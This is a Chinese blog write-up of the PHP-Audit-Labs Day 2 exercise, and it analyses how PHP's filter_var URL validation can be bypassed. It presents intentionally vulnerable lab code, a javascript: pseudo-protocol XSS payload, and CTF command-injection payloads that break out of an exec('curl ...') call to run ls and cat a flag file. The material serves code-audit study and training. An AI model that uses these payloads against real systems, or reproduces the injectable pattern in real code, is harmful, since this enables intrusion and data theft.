PHP-Audit-Labs-Day2 - filter_var函数缺陷

最新推荐文章于 2024-11-13 19:30:51 发布
最新推荐文章于 2024-11-13 19:30:51 发布
阅读量44 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43335965/article/details/133078850
版权
目录

分析

先看源码

// composer require "twig/twig"
require 'vendor/autoload.php';

class Template {
  private $twig;

  public function __construct() {
    $indexTemplate = '<img ' .
      'src="https://loremflickr.com/320/240">' .
      '<a href="{{link|escape}}">Next slide &raquo;</a>';

    // Default twig setup, simulate loading
    // index.html file from disk
    $loader = new Twig\Loader\ArrayLoader([
      'index.html' => $indexTemplate
    ]);
    $this->twig = new Twig\Environment($loader);
  }

  public function getNexSlideUrl() {
    $nextSlide = $_GET['nextSlide'];
    return filter_var($nextSlide, FILTER_VALIDATE_URL);
  }

  public function render() {
    echo $this->twig->render(
      'index.html',
      ['link' => $this->getNexSlideUrl()]
    );
  }
}

(new Template())->render();

漏洞点在10行的escape和第22行的filter_var函数。他先是用Twig自带的escape过滤器对link进行过滤,但是escape过滤器的实现是使用了php的内置函数htmlspecialchars,看一下这个函数的用法:

(PHP 4, PHP 5, PHP 7)
htmlspecialchars — 将特殊字符转换为 HTML 实体

转换的特殊字符如下:

字符	替换后
& (& 符号)	&amp;
" (双引号)	&quot;,除非设置了 ENT_NOQUOTES
' (单引号)	设置了 ENT_QUOTES 后, &#039; (如果是 ENT_HTML401) ,或者 &apos; (如果是 ENT_XML1、 ENT_XHTML 或 ENT_HTML5)。
< (小于)	&lt;
> (大于)	&gt;

示例

<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new;

结果是 <a href='test'>Test</a>
接着是$nextSlide变量,使用GET方式接收,用户可控,但是使用了filter_var处理,看一下filter_var函数。

(PHP 5 >= 5.2.0, PHP 7)
filter_var — 使用特定的过滤器过滤一个变量
filter_var(待过滤的参数,使用的过滤器)

这里使用的是FILTER_VALIDATE_URL过滤器,FILTER_VALIDATE_URL 过滤器把值作为 URL 来验证。
payload是用到了javascript伪协议。浓缩一下上面的源码:

<?php
$url = filter_var($_GET['url'],FILTER_VALIDATE_URL);
var_dump($url);
echo '<br>';
$url = htmlspecialchars($url);
var_dump($url);
echo '<br>';
echo "<a href='$url'>Next slide</a>";

payload

payload:
?url=javascript://comment%250aalert(123);

结果
我们看一下这个payload,在javascript中//代表单行注释,但是因为在alert(123)之前加了%0a,%0a是换行符,所以alert(123)与//不在一行。这里之所以将%0a改成%250a,是因为浏览器会进行一次编码,所以我们提前将%编码成%25,那么浏览器将

?url=javascript://comment%250aalert(123);

解码成

?url=javascript://comment%0aalert(123);

然后执行程序存储在$url变量里。

修复建议

对XSS漏洞最好就是过滤关键字,将特殊字符进行HTML实体编码替换

Day02-CTF题解

题目源码:

// index.php
<?php 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>
// f1agi3hEre.php
<?php  
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"
?>

大致看一下源码,第7行exec执行curl命令,很容易能想到命令执行,$site_info['host']是对我们输入的url参数分解拿到的主机名,在第6行的正则匹配的时候,$site_info['host']必须是sec-redclub.com。源码的逻辑就是用户输入url参数,然后filter_var函数使用FILTER_VALIDATE_URL过滤器对url进行过滤,接着parse_url提取出主机名,如果主机名是sec-redclub.com则exec执行curl命令。
先得绕过filter_var的FILTER_VALIDATE_URL过滤去,绕过方法:

http://localhost/index.php?url=http://demo.com@sec-redclub.com
http://localhost/index.php?url=http://demo.com&sec-redclub.com
http://localhost/index.php?url=http://demo.com?sec-redclub.com
http://localhost/index.php?url=http://demo.com/sec-redclub.com
http://localhost/index.php?url=demo://demo.com,sec-redclub.com
http://localhost/index.php?url=demo://demo.com:80;sec-redclub.com:80/
http://localhost/index.php?url=http://demo.com#sec-redclub.com
PS:最后一个payload的#符号,请换成对应的url编码 %23

payload

http://localhost/index.php?url=demo://%22;ls;%23;sec-redclub.com:80/

payload解码后是

http://localhost/index.php?url=demo://";ls;#;sec-redclub.com:80/

直接用 cat f1agi3hEre.php 命令的时候,过不了 filter_var 函数检测,因为包含空格,具体payload如下:

http://localhost/index.php?url=demo://%22;cat<f1agi3hEre.php;%23;sec-redclub.com:80/

参考链接

https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day2/files/README.mdhttps://github.com/hongriSec/PHP-Audit-Labs/blob/master/PHP-Audit-Labs题解/Day1-4/files/README.md

Held0
关注
PHP-Audit-Labs学习
heySister
12-10 1750
Day1 这个讲到的是in_array() 这个函数的一个错误使用导致的过滤不严格问题。 in_array() 函数的第三个函数是配置是否进行强匹配的,很多情况下使用者都会忽略第三个参数,从而只进行弱匹配。 一般用来限定输入只能是数组中的几个数值,但是当我们输入的是字符串的时候,由于是判断是否在一个数字数组中,所以会强制类型转换为数字。只要我们保证强制类型转换后的结果在数组中就可以了,这样就可以绕...
探索PHP安全的宝库:PHP-Audit-Labs
gitblog_00097的博客
05-13 399
探索PHP安全的宝库:PHP-Audit-Labs 去发现同类优质开源项目:https://gitcode.com/ 在这个充满挑战的时代,开发者们不断追寻着代码的安全性。PHP-Audit-Labs,由红日安全-代码审计小组精心打造,正是这样一个专为学习和提升代码审计技能的开源项目。它不仅提供了详尽的分析教程,还有实战性质的CTF靶场,让你在学习中积累经验,成为安全领域的佼佼者。 项目介绍 PH...
[红日安全]代码审计Day2 - filter_var函数缺陷
hongrisec的博客
03-10 522
本文由红日安全成员: 七月火 编写,如有不当,还望斧正。 前言 大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并结...
PHP-Audit-Labs第一阶段学习总结
weixin_44599080的博客
02-01 2001
这里写自定义目录标题DAY 1DAY 2DAY 3DAY 4DAY 5插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 由于篇幅原因,源码详见GITHUB源码链接。同时在这感谢红日...
代码审计——filter_var函数
negnegil的博客
06-11 1232
这里写目录标题红日安全代码审计——day2源码分析linux下的利用windows下的利用 红日安全代码审计——day2 原项目地址: https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day2/files/README.md 本文是对day2课后习题的解题及学习 // index.php <?php $url = $_GET['url']; if(isset($url) && filter_var($url,
filter_var函数缺陷
mysteryflower的专栏
09-27 402
本文由红日安全成员:七月火编写,如有不当,还望斧正。 前言 大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫PHP-Audit-Labs。现在大家所看到的系列文章,属于项目第一阶段的内容,本阶段的内容题目均来自PHP SECURITY CALENDAR 2017。对于每一道题目,我们均给出对应的分析,...
%3cphp和%3c php_php代码审计学习之函数缺陷
weixin_35682426的博客
12-30 2977
php代码审计学习之函数缺陷in_array函数缺陷Wish ListCodeclass Challenge {const UPLOAD_DIRECTORY = './solutions/';private $file;private $whitelist;public function __construct($file) {$this->file = $file;$this->wh...
tp5类的属性不存在_php代码审计学习之函数缺陷
weixin_39989939的博客
12-19 2690
php代码审计学习之函数缺陷in_array函数缺陷Wish ListCodeclass Challenge {const UPLOAD_DIRECTORY = './solutions/';private $file;private $whitelist;public function __construct($file) {$this->file = $file;$this->wh...
phpcs-security-auditphpcs-security-audit是一组PHP_CodeSniffer规则,用于发现与PHP代码中的安全性相关的漏洞和弱点
02-06
phpcs-security-audit v3 关于 phpcs-security-audit是一组规则,用于查找与PHP代码中的安全性相关的漏洞和弱点。 目前,它具有核心PHP规则以及Drupal 7特定规则。 该工具还检查与CMS /框架相关的CVE问题和安全...
django-easy-audit:另一个Django审核日志应用程序,希望是最简单的一个
02-04
django-easy-audit 另一个Django审核日志应用程序,希望是最简单的。 这个应用程式可让您追踪使用者采取的所有动作。 快速开始 通过运行pip install django-easy-audit安装Django Easy Audit。 或者,您可以从...
audit-plugin-mysql-5.7-1.1.11-985-linux-x86_64
04-09
这个名为 "audit-plugin-mysql-5.7-1.1.11-985-linux-x86_64" 的压缩包包含了一个针对 MySQL 5.7 版本的审计解决方案,特别设计用来记录和分析数据库的各种操作,如查询、登录尝试、权限变更等。 审计插件的主要...
弄巧成拙的 PFC(Priority-based Flow Control)
Netfilter
11-09 2163
InfiniBand 满足 RDMA 的需求,但复杂且昂贵,需要专用 IB 链路层支撑,而 RoCE 旨在普遍的以太网上部署 RDMA,但以太网是有损网络,会拥塞而丢包,丢包重传会增加网卡实现的复杂性同时增加时延,抵消 RDMA 的优势。不要指望网络无损,因为不丢包不可能,丢包原因又不止拥塞一种,PFC 显然无法覆盖所有场景,问题的核心应集中在丢包恢复,而拥塞控制完全从丢包解耦,拥塞不与丢包关联,自然就是另一个独立问题。即便不重构整个网络,只要从本质出发,问题的解法也会比 PFC 更高尚。
Latex中给公式加边框
Angelaboy的博客
11-08 452
Latex中给公式加边框
MDBook 使用指南
qq_39517117的博客
11-12 489
介绍了 MDBook 的基本使用方法,并演示了一个简单的构建过程。
Autosar CP 基于CAN的时间同步规范导读
最新发布
11-13 591
这个示例简单地模拟了AUTOSAR CP基于CAN的时间同步规范中的一些基本概念,如时间获取、消息发送和接收以及错误处理。实际的时间同步规范会更加复杂,涉及更多的细节和功能,例如消息格式、序列计数器管理、时间验证、安全机制等。但这个示例可以帮助你理解时间同步的基本工作原理。
Sigrity SPEED2000 Power Ground Noise Simulation模式如何进行电源地噪声分析操作指导-SODIMM
weixin_54787054的博客
11-09 325
由于只需要将DRAM的电源设置为激励源,但是DRAM目前连接了许多非电源网络,设置激励源比较麻烦,所以需要单独创建4个只含有电源和地pin的component代替DRAM,较为简便。这是一个SODIMM的PCB文件,本例中仿真TOP层4个DRAM的噪声对于电源地的影响,同时观测在噪声激励下,4个DRAM电压时域波形。本例中是这个模式来观测电源的时域波形,除此之外这个模式也是可以的用来观测信号的电压时域波形的。可以看到使能后,电源的噪声幅度会更大,更接近实际情况。勾选以下选项,将这些影响都纳入仿真分析。
【故障解决】麒麟系统右下角网络图标取消显示叹号
鹏大圣运维
11-13 951
Hello,大家好啊!今天给大家带来一篇关于如何在麒麟系统中解决网络图标出现感叹号问题的文章。在日常使用麒麟系统的过程中,我们在内网或公网环境下,有时会遇到网络图标上出现感叹号的情况。这通常是因为系统默认的 NetworkManager.conf 配置文件中指定了一个用于网络探测的 uri 地址,当系统无法访问这个地址时,就会认为网络不通,从而显示感叹号。即便在公网环境下,有时也会遇到这种问题。今天我们就来介绍几种解决方法,帮助大家轻松排除困扰!欢迎大家分享点赞,点个在看和关注吧!
[FBCTF 2019]rceservice 详细题解
weixin_73904941的博客
11-09 1441
如果在字符串最末尾的 } 之前加上一个%0a {%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}此时 \x00-\x1F 匹配了第一个%0a 但是最后的.* 不能匹配换行符,也匹配不到换行后的 }所以不能遍历完整字符串,返回值为空,完成正则绕过//而在单行模式下$ 似乎会忽略在句尾的 %0a 所以如果%0a 添加在字符串最后的} 的后面的话依然会被匹配构造?
Laravel用户活动追踪解决方案 - laravel-user-audit-trails
资源摘要信息:"laravel-user-audit-trails是一个专为Laravel框架设计的轻量级软件包,旨在简化用户审计跟踪功能的实现。通过集成到Laravel的Eloquent ORM中,它使得开发者能够轻松记录数据库表中创建、更新以及删除...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值